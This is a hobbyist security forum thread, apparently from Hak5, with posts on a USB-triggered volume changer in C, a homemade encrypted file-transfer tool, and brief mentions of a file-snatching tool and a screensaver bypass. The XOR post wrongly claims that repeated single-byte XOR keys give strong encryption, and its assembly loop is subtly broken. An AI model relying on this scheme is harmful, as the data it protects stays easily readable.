    int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
        GetLogicalDriveStringsA(300, Drives);
        int dOffset = 0;
        char* DriveString = (char*)&Drives;
        while(*(DWORD*)DriveString != 0) // locate "VolumeChanger32.ini on your USB drive!
            sprintf(VCini, "%s%s", DriveString, "VolumeChanger32.ini");
            f = fopen(VCini, "rb");
                fread(volumestring, 5, 1, f);
                newvolume = atoi(volumestring);
                inifound = 1;
            dOffset += 4;
            DriveString = (char*)&Drives + dOffset;
        if(inifound == 1)
            sprintf(logpath, "%s%s", DriveString, "VC_log.txt");
            logfile = fopen(logpath, "wb");
            sprintf(dbg, "ini file found at: %s \r\n", VCini);
            fwrite(dbg, strlen(dbg), 1, logfile);
            return 0;
        GetDevices(); // enumerate sound devices
        if(SetVolume(newvolume) == 1) // change volume to what was specified in the ini file!
            fwrite("Volume Changed Successfully!", 28, 1, logfile);
        // Pretty Simple Eh?;)
        return 1;


    char* GetMixerError(MMRESULT Code);
    FILE* logfile = 0;
    char dbg[364];
    unsigned int NumDevices, NumControls;
    HMIXER hMixer = 0;
    MMRESULT Result;
    int SetVolume(DWORD volume)
        //Set volume level
        Details.cbStruct = sizeof(MIXERCONTROLDETAILS);
        Details.dwControlID = 1; //Master Volume
        Details.cChannels = 1;
        Details.cMultipleItems = 0;
        Details.cbDetails = sizeof(MIXERCONTROLDETAILS_UNSIGNED);
        Details.paDetails = &Value;
        Value.dwValue = volume;
        Result = mixerSetControlDetails((HMIXEROBJ)hMixer, &Details, MIXER_OBJECTF_HMIXER | MIXER_GETCONTROLDETAILSF_VALUE);
        if(Result == MMSYSERR_NOERROR)
            return 1;
            sprintf(dbg, "%u Failed: %s\r\n", __LINE__, GetMixerError(Result));
            fwrite(dbg, strlen(dbg), 1, logfile);
        return 0;
    void GetDevices()
       //Get # of devices
       NumDevices = mixerGetNumDevs();
       sprintf(dbg, "# of devices: %d \r\n", NumDevices);
       fwrite(dbg, strlen(dbg), 1, logfile);
       for(unsigned int DeviceID = 0; DeviceID < NumDevices; DeviceID++)
            //Open the device
            Result = mixerOpen(&hMixer, DeviceID, 0, 0, MIXER_OBJECTF_MIXER);
            if(Result == MMSYSERR_NOERROR)
                sprintf(dbg, "Device # %u Opened Successfully! \r\n", DeviceID);
                fwrite(dbg, strlen(dbg), 1, logfile);
                sprintf(dbg, "%u Failed: %s\r\n", __LINE__, GetMixerError(Result));
                fwrite(dbg, strlen(dbg), 1, logfile);
            //Get the number of controls, channels, device name, etc
            Line.cbStruct = sizeof(MIXERLINE);
            Line.dwComponentType = MIXERLINE_COMPONENTTYPE_DST_SPEAKERS;
            if(Result == MMSYSERR_NOERROR)
                sprintf(dbg, "Prod. Name: \"%s\"\r\nShort Name: \"%s\"\r\nFull Name: \"%s\"\r\n%d channels, %d controls\r\n", Line.Target.szPname, Line.szShortName, Line.szName, (unsigned int)Line.cChannels, (unsigned int)Line.cControls);
                fwrite(dbg, strlen(dbg), 1, logfile);
                sprintf(dbg, "%u Failed: %s\r\n", __LINE__, GetMixerError(Result));
                fwrite(dbg, strlen(dbg), 1, logfile);
            //Get the value and text of each control
            NumControls = Line.cControls;
            for(unsigned int ControlID = 1; ControlID < NumControls + 1; ControlID++) //IDs are NOT zero-based
                sprintf(dbg, "Control # %u\r\n", ControlID);
                fwrite(dbg, strlen(dbg), 1, logfile);
                Control.cbStruct = sizeof(MIXERCONTROL);
                LineControls.cbStruct = sizeof(MIXERLINECONTROLS);
                LineControls.dwControlID = ControlID;
                LineControls.cControls = 1;
                LineControls.cbmxctrl = sizeof(MIXERCONTROL);
                LineControls.pamxctrl = &Control;
                Result = mixerGetLineControls((HMIXEROBJ)hMixer, &LineControls, MIXER_GETLINECONTROLSF_ONEBYID);
                if(Result == MMSYSERR_NOERROR)
                    sprintf(dbg, "\tShort Name: \"%s\"\r\n\tFull Name: \"%s\"\r\n\tItems: %d\r\n\tRange: %u to %u\r\n\tSteps: %d\r\n", Control.szShortName, Control.szName, (unsigned int)Control.cMultipleItems, (unsigned int)Control.Bounds.dwMinimum, (unsigned int)Control.Bounds.dwMaximum, (unsigned int)Control.Metrics.cSteps);
                    fwrite(dbg, strlen(dbg), 1, logfile);
                    sprintf(dbg, "%u Failed: %s\r\n", __LINE__, GetMixerError(Result));
                    fwrite(dbg, strlen(dbg), 1, logfile);
                //Get value
                Details.cbStruct = sizeof(MIXERCONTROLDETAILS);
                Details.dwControlID = ControlID;
                Details.cChannels = 1; //All channels at the same time
                Details.cMultipleItems = 0;
                Details.cbDetails = sizeof(MIXERCONTROLDETAILS_UNSIGNED);
                Details.paDetails = &Value;
                Result = mixerGetControlDetails((HMIXEROBJ)hMixer, &Details, MIXER_OBJECTF_HMIXER | MIXER_GETCONTROLDETAILSF_VALUE);
                if(Result == MMSYSERR_NOERROR)
                    sprintf(dbg, "\tValue: %u\r\n", (unsigned int)Value.dwValue);
                    fwrite(dbg, strlen(dbg), 1, logfile);
                    sprintf(dbg, "%u Failed: %s\r\n", __LINE__, GetMixerError((MMRESULT)Result));
                    fwrite(dbg, strlen(dbg), 1, logfile);
            fwrite("\r\n", 2, 1, logfile);
    char* GetMixerError(MMRESULT Code)
          case MMSYSERR_ALLOCATED:
             return "Already allocated by max # of clients";
             return "Invalid device ID";
          case MMSYSERR_INVALFLAG:
             return "Invalid flag";
             return "Invalid handle";
             return "Invalid parameter";
          case MMSYSERR_NODRIVER:
             return "No device available";
          case MMSYSERR_NOMEM:
             return "Not enough memory";
             return "Unknown error";

  16. I really wish you hadn't limited this to C++. I could definitely give you something good in Java. But that's the way the game is played, so I hope Snakey can make something beautiful.

    cout << "With a name like cout, you'd think you were a C++ programmer! \n";

    I guess you forgot to #include <iostream> lol my attempt at a joke! :lol:

    Java is cool, I think I might pick it up! I like the cross-platform aspect of it!

    For example I could code a multiplayer game in c++, but only people who run windows would be able to play it, they'd have to run the EXE client!

    If I learned Java! I could make a Java client along with the EXE client, so then Linux and Mac people could also play my game! Using the Java version of course! Maybe even through a web browser! I like the idea of that!

    So I think I'm going to learn Java as well! And If you coded up something with Java using sockets that would sure give me a head start on it!


    So now anyone can enter! No matter what you code in! Go ahead and give it a try!

    cout! I'll be looking forward to seeing some Java :)

    And heres to a hot cup a joe' to get the codes flowing!


  17. Very long ago there used to be an internet cafe close by me and my friends houses. It was back at a time where like nobody had a fast computer so you had to go to the cafe to actually be able to play CS as our computers weren't powerful enough to run it! it was v1.5! before steam ever came out!

    For the first year its the funnest game ever and you love playing it, so enjoy! But after you've played it for some years it just isn't the same! don't get me wrong its still a fun game but, you just can't enjoy it like you used to be able too! anyone else feel the same way?

    Well anyway recently I started playing CS Source because the better graphics looked cool. And now for some reason I cannot play 1.6 anymore!!!! the graphics just look horrible to me now since I've played CS:S!!!

    so yeah :)

  18. 110mb.com the best in my opinion!


    5GB disk space




    the works!

    I somehow stumbled upon it a couple years back! and never forgot the url since :) I don't think my website there has ever gone down either so its pretty much like paid hosting for free! and you can even buy a domain name for about $10 and no one will ever know you have free hosting ;)

    or if you leave your computer running all the time, running an apache webserver is always a fine option!!

  19. Ok Snakey, glad you want to give this a try! Here's a good link that helped me alot with learning winsock!


    csocket? I believe that is MFC. I don't like MFC so I don't use it! MFC tends to call things starting with "C" like CSocket, or CWnd...

    But No! you don't need MFC to use winsock!

    That link should give you a basic understanding of winsock with TCP protocol... to further help you out after reading that you could look over the source code to my demo project which makes use of winsock!

    Its called "Krypt-2-Send" and "Krypt-2-Recieve"... its an encrypted file transfer utility.


    Note: this is coded with dev cpp! so if using that you'll need to link to libws2_32.a in the "lib" folder of the dev cpp directory... goto project->project options, click on parameters tab and click the add library or object button.

    It works like this, the person wanting to send a file to someone runs K2S(Krypt-2-Send) and sets up the server with the file to transfer, the port to listen on, and optionally sets a password(it is recommended though that you do use a password because then the file will be encrypted with the password!!) If you don't use a password the file is still encrypted but only with the key specified in the box.

    on running K2S it generates a random number between 1-255 to use as the key to encrypt the file along with the password, you can also change it if desired...

    when you choose a file to transfer either by pressing the browse button or typing the file path, the recommended buffer size(IN KB) is filled in the box. (you may be wondering why is buffer size important? and why is it changeable?) because the larger the buffer size the LESS read/write operations are done both server/client side!

    this affects download speed! only because read/write operations are slow, so for example, if you were transferring a 100MB file, if you made the buffer size 1KB, there would have to be 102400 read operations on the server side(K2S) and 102400 write operations on client side(K2R)

    that would considerably slow down the download! (not download speed but, how long it would take to recieve the file)

    K2S minimizes to the tray for convenience.

    If you made the buffer 1024 KB (1MB) then there would only be 100 read/write's and the difference is great! So I think maybe that's a reason why most file transfer programs like built into instant messengers take longer to transfer files than this because they use a fixed small buffer size! ;)

    also this determines how often the progress bar will show progress. I think 1% of the file is good enough for a fast transfer but feel free to increase as desired...

    The person wanting to recieve the file, they just run K2R, type in the host and port of the server hosting the file to transfer! and password if needed and click download file!

    host and port must be in this format: "host:port"

    "host" does not have to be a host name it can be an ip address to... for example ( and (localhost:27015)

    are both valid!

    I have Krypt-2-Send on my computer running right now in my system tray, listening on port 27015. Someone download Krypt-2-Recieve and try to download the file from me!! :P

    use "popeax.com:27015" as the host:port!

    and password is "hak5live"

    If anyone successfully downloads the file post here and say what the file name is :)







    It should work even if multiple people try to download at one time! though the percentage wont be shown correctly on the server!

    Does anyone know how to calculate multiple percentages into one? for example like how firefox does it! when you download more than one file, along with showing you the percentage of each file, it shows you the total complete percentage of all the files your downloading! Thats what im trying to figure out...

    Also files over 2GB (about this size) wont transfer, because I haven't figured out how to determine a file's size if its over this 2 billion bytes/ Im thinking this is because 4 bytes can't hold a number larger than 2.x billion... So theres gotta be someway to use more bytes to store the file size that I haven't figured out yet...

    NOTE: K2S and K2R are still in beta stages and there are some bugs I haven't worked out yet... So keep that in mind it may not work perfectly!

    mini tut on source code:

    unsigned char microcode[25] = {0x55, 0x8B, 0xEC, 0x8B, 0x45, 0x08, 0x8B, 0x5D, 0x0C, 0x8A,
     0x4D,0x10, 0x30, 0x0C, 0x03, 0x83, 0xFB, 0x00, 0x4B, 0x75, 0xF7, 0xC9, 0xC2, 0x0C, 0x00};
    typedef void (CALLBACK* EnKrypt)(void*, DWORD, BYTE);
    EnKrypt Krypt = (EnKrypt)&amp;microcode;

    that is the encrypt function, it is the same as this:

    Krypt proc Buffer:DWORD, BufferSize:DWORD, Key:BYTE
        mov eax, [Buffer]
        mov ebx, [BufferSize]
        mov cl, [Key]
        xor byte ptr [eax+ebx], cl
        cmp ebx, 0
        dec ebx
        jne @b
    Krypt endp

    the code was originally inside a dll written in MASM32, but I didn't like using loadlibrary and getprocaddress just to use this one function So i had the idea to just extract the raw bytes that make the opcodes, and use the function like that! and since the code is 100% relocatable it works!

    I created some classes to make winsock coding a little easier for me, I'll explain how to use this classes in case you'd want to use them...

    on the server FileTransfer_S.h contains the server classes

    xClient is a client object, one will be created for each client the server is communicating with...

    xServer is a server object, only one will be created... this will make the server listen on the desired port...

    creating these objects are simple...

    you could write:

    xClient client[10];
    xServer server;

    that would create 10 client objects and 1 server object

    or you could do

    xServer* server = new xServer;

    which creates a pointer to an xServer while simultaneously creating an xServer object...

    I like doing it that way so I can write server-> instead of server.

    with your server object created, to get your server bound and listening on a specified port call it like

    if you created a pointer


    if you just created an object


    where "port" is an integer specifying the port to listen on! this is the port the client will connect on

    ill add more later, I gotta go right now ;)

  20. I really have no say on this matter but I can't say I approve of the use of the Hak.5 logo as an icon for such a tool. It kind of suggests that Hak5 and/or its community endorse the tool.

    You are absolutely right moonlit! It was silly of me to use that icon for this app. I have changed the icon to something more appropriate.


    check my post, I updated it to version 1.2! case no longer matters! for example if a file contained

    "Coca Cola"

    and you had one of your search strings as "coca cola"

    previously the file wouldn't be snatched, but now it does a case in-sensitive search so the file will be gotten regardless of the case.

    Also this version supports many search strings and file extensions instead of only 1.

  21. lol "Cryptynalis"?

    I know a cool XOR encryption method!

    Its a basic 8 bit encryption algorithm... it works, and its pretty neat. The only downside is since its only 8 bit, theres only 255 possible encryption keys, which someone could easily crack the encryption if they coded a little program, but It can be strengthened.

    its a simple little procedure

    Encrypt proc Buffer:DWORD, BufferSize:DWORD, Key:BYTE
        mov eax, [Buffer]; address of buffer to encrypt goes in eax
        mov ebx, [BufferSize]; buffer size goes in ebx
        mov cl, [Key]; encryption key goes in 'cl'
        xor byte ptr [eax+ebx], cl
        dec ebx
        cmp ebx, 0
        jne NotDoneYet
    Encrypt endp

    It takes 3 parameters.

    1. The "Buffer" which can be anything really it could point to a string, or a file in memory, anything you'd want to be encrypted.

    2. The "BufferSize" this should be the size of the string/file/whatever your going to encrypt.

    3. The encryption "Key" a number between 1-255. 255 is the largest number that can fit in 8 bits / 1 byte

    eax, ebx, ecx, edx, esi, edi are all 32 bit registers, 32 bits = 4 bytes, ax, bx, cx, dx, si, di are 16 bit registers, the lower 16 bits of the 32 bit ones. 16 bits = 2 bytes.

    so without giving too much of an assembly lesson here you can probably figure out that "cl" is the lower 8 bits of the cx register, ch being the higher 8 bits...

    so what it does is, after you call it with correct parameters, and after it sets up the registers.

    it does a bitwise operation XOR with the 8 bit key and the value of the buffer address + buffer size, which is the last byte of the buffer, at the start of calling the function. After, it decreases the register that holds the buffer size which then gives the second to last byte of the buffer, and so on and so forth, until the whole entire buffer has been xor'd.

    to decrypt, its the same procedure, call the function again using the same key as before and it will be decrypted.

    I have thought of a way to make it stronger though, and require more attempts.

    instead of just calling the function once with 1 key. Call the function many more times, using different keys each time.

    for example encrypt the buffer once with 101, then again with 37, then again with 222, again with 194...

    now the only way(I think) to get back to the original buffer would be to call the function with 194, then 222, then 37, and 101, then finally you'd have the original string or file :)

    You could even do it with a password, for example you could use this password "lamepassword"

    l a m e p a s s w o r d

    6c 61 6d 65 70 61 73 73 77 6f 72 64

    each character fits in a byte, so if you used that password you would call the encrypt function 12 times, to both encrypt and decrypt your buffer...

    you'd first call it with 0x6C as the key, all through the 12th byte 0x64, and to decrypt, you'd do the same but in reverse order, starting from 0x64, ending with 0x6C...

    It works, but I'm skeptical on how secure it actually is! But its surely way more secure than just doing it 1 time with a 1-255 key

    heres some cyphertext I encrypted with this method using only 1 key though



    and I'll give you a hint (key > 200)

    that one above could be cracked almost immediately since it only has 255 possible keys and it would be in plain text! Plus I even narrowed it down..

    No one will ever get this one:








    That was in a buffer, and the encrypt function was called 23 times (a 23 character password) xor'd each time with each character starting from the first.

    So without knowing the password, you can't do anything with it! :)

    Of course you could code a cracker, but I think there's way tooo many possibilities that it would take too long to crack. Let me know your idea's on this method


  22. Have you tried your bypass method?

    Have you ever played a directx game and have you walked away from the game for a while to come back and see the screensaver going?

    I don't think that's ever happened to me. And I've just tried it both with and without checking the "on resume, password protect" check box, and either way no screensaver popped up! So I'm pretty confident screensavers don't interrupt directx apps.

    But I have thought of two ways to bypass it, can you think of them or more? That would be interesting to see ways people can come up with.

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